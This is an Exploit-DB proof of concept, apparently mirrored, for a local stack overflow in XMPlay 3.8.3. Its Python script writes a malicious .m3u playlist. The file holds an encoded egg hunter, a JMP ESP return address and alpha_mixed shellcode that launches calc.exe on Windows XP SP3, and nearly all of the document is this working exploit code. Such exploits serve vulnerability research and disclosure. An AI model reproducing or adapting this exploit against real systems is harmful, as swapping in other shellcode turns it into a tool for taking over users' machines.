XMPlay 3.8.3 – ‘.m3u’ Local Stack Overflow Code Execution

  • 作者: s7acktrac3
    日期: 2018-12-20
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/46020/
  • #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    # Exploit Title: XMPlay 3.8.3 - '.m3u' Code Execution (PoC)
    # Date: 2018-12-19
    # Exploit Author: s7acktrac3
    # Vendor Homepage: https://www.xmplay.com/
    # Software Link: https://support.xmplay.com/files_view.php?file_id=676
    # Version: 3.8.3 (latest at the time of writing, 2018-12)
    # Tested on: Windows XP SP3
    # CVE : Reserved
    #
    # Developer notified & delivered PoC but not interested in fixing :P 
    #
    # Reproduction Steps:
    # Launch XMPlay & run this PoC script - it will create a file in the same directory named xmplay.m3u
    # Either drag xmplay.m3u into the XMPlay window or open it from the File menu (select xmplay.m3u, the file this script writes). The application will "load"
    # for a minute (the egg hunter is searching memory for the second-stage payload) and eventually launch calc.exe
    #
    # Major Shouts @Gokhan @foolsofsecurity for helping turn the DoS into Code execution & me into more of a 
    # beast!
     
    from struct import pack
    
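    # ---------------------------------------------------------------------------
    # Python 3 port of the original (Python 2) PoC. Everything that ends up in the
    # .m3u file is handled as bytes: on Python 3 struct.pack() returns bytes, so the
    # original str concatenation raised TypeError, and a text-mode open() would
    # re-encode the shellcode and translate newlines. The file is now written in
    # binary mode through a context manager. Only run this in an isolated lab VM.
    # ---------------------------------------------------------------------------

    max_size = 728      # total length of the overflow string appended to "http://test."
    eip_offset = 500    # bytes from the start of that string to the overwritten return address

    # M3U header; the overflow string is appended to the URL entry. "\n\r" (LF, CR)
    # is what the author shipped and tested - kept verbatim rather than "corrected".
    file_header = b"#EXTM3U\n\r"
    file_header += b"#EXTINF:200,Sleep Away\n\r"
    file_header += b"http://test."

    # Egg hunter, alphanumeric-encoded by msfvenom with EDX as its base register
    # (presumably to get past bad characters in the .m3u path handling - the author
    # does not say why). Verbatim encoder output, including the leading 0x4a run;
    # do not trim or "clean up" any of it.
    #   cat egghunter.txt | tr -d '"' | tr -d '\n' | tr -d '\\x' | xxd -r -p > egghunter.bin
    #   msfvenom -p generic/custom PAYLOADFILE=egghunter.bin -e x86/alpha_mixed BufferRegister=EDX -a x86 --platform Windows
    encoded_egg_hunter = (
        b"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
        b"\x4a\x4a\x37\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
        b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50"
        b"\x38\x41\x42\x75\x4a\x49\x62\x46\x6f\x71\x4b\x7a\x49\x6f\x44"
        b"\x4f\x53\x72\x36\x32\x61\x7a\x46\x62\x66\x38\x78\x4d\x64\x6e"
        b"\x75\x6c\x75\x55\x63\x6a\x54\x34\x68\x6f\x6d\x68\x63\x47\x34"
        b"\x70\x54\x70\x72\x54\x4e\x6b\x58\x7a\x4e\x4f\x42\x55\x6b\x5a"
        b"\x4c\x6f\x31\x65\x78\x67\x59\x6f\x39\x77\x41\x41"
    )

    # Second stage, located in memory by the hunter: the 8-byte "w00tw00t" tag
    # (the conventional egg-hunter marker - inferred from the layout, the hunter
    # itself is opaque encoded bytes here), a 6-byte stub the author describes as
    # PUSH EDI / POP EAX / ADD AL,6 / PUSH EAX / POP ESI, then the alpha_mixed-
    # encoded payload that launches calc.exe.
    encoded_calc = b"w00tw00t" + b"\x57\x58\x04\x06\x50\x5E"
    encoded_calc += b"\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49"
    encoded_calc += b"\x49\x49\x49\x49\x49\x49\x49\x49\x37\x51"
    encoded_calc += b"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
    encoded_calc += b"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
    encoded_calc += b"\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75"
    encoded_calc += b"\x4a\x49\x36\x51\x49\x59\x52\x71\x61\x78"
    encoded_calc += b"\x75\x33\x50\x61\x72\x4c\x31\x73\x73\x64"
    encoded_calc += b"\x6e\x58\x49\x57\x6a\x33\x39\x52\x64\x37"
    encoded_calc += b"\x6b\x4f\x38\x50\x41\x41"

    # First stage, executed right after the JMP ESP: take ESP, subtract 0x5555553C
    # three times (0xFFFFFFB4 in total, i.e. +0x4C = +76 modulo 2**32; split into
    # three SUBs presumably to avoid bad characters) and move the result into EDX,
    # the base register the encoded egg hunter expects. The 76-byte slot this stub
    # is padded to below matches that displacement; where exactly EDX lands depends
    # on the value of ESP at that moment, which only the author's test run establishes.
    egg_addr_to_edx = b""
    egg_addr_to_edx += b"\x54"                  # PUSH ESP
    egg_addr_to_edx += b"\x58"                  # POP EAX
    egg_addr_to_edx += b"\x2D\x3C\x55\x55\x55"  # SUB EAX,5555553C
    egg_addr_to_edx += b"\x2D\x3C\x55\x55\x55"  # SUB EAX,5555553C
    egg_addr_to_edx += b"\x2D\x3C\x55\x55\x55"  # SUB EAX,5555553C
    egg_addr_to_edx += b"\x50"                  # PUSH EAX
    egg_addr_to_edx += b"\x5A"                  # POP EDX

    jmp_esp = 0x78196d4d    # JMP ESP in an OS DLL; Windows XP SP3 per the author, so OS/SP specific
    stupid_char = b"|"      # trailing byte the author appends after the overflow string; its role is not documented


    def pad_to_slot(region, size, filler):
        """Return *region* right-padded with *filler* to exactly *size* bytes.

        Raises ValueError when *region* is larger than its slot. The original's
        ``"A" * (size - len(region))`` silently produced an empty pad in that case
        and shifted every later offset, which is much harder to diagnose.
        """
        if len(region) > size:
            raise ValueError(
                "region of %d bytes does not fit in %d-byte slot" % (len(region), size)
            )
        return region + filler * (size - len(region))


    def build_payload():
        """Return the max_size-byte overflow string (header and terminator excluded).

        Layout, offsets in bytes:
          0     12 x 'A'
          12    encoded_calc (egg tag + calc.exe stage), 'A'-padded up to eip_offset
          500   return address -> JMP ESP
          504   'BBBB'
          508   egg_addr_to_edx, 'C'-padded to a 76-byte slot
          584   encoded_egg_hunter
          ...   'C' padding up to max_size
        """
        stage = pad_to_slot(b"A" * 12 + encoded_calc, eip_offset, b"A")
        stage += pack("<L", jmp_esp)
        stage += b"BBBB"
        stage += pad_to_slot(egg_addr_to_edx, 76, b"C")
        stage += encoded_egg_hunter
        return pad_to_slot(stage, max_size, b"C")


    def build_exploit():
        """Return the complete xmplay.m3u contents: header + overflow string + terminator."""
        return file_header + build_payload() + stupid_char


    def main():
        """Write xmplay.m3u into the current directory (see the reproduction steps above)."""
        payload = build_payload()
        # The original printed the padded pre-EIP stage length, which is eip_offset by construction.
        print("Length of payload " + str(eip_offset))
        print("[+] Creating .m3u file with payload size: " + str(len(payload)))
        # Binary mode writes the literal bytes. The original opened the file in text
        # mode, which on Windows (the author's test platform) would have turned the
        # header's "\n" into "\r\n"; if the PoC stops triggering, that line-ending
        # difference is the first thing to re-check.
        with open("xmplay.m3u", "wb") as fh:
            fh.write(file_header + payload + stupid_char)
        print("[+] Done creating the file")


    if __name__ == "__main__":
        main()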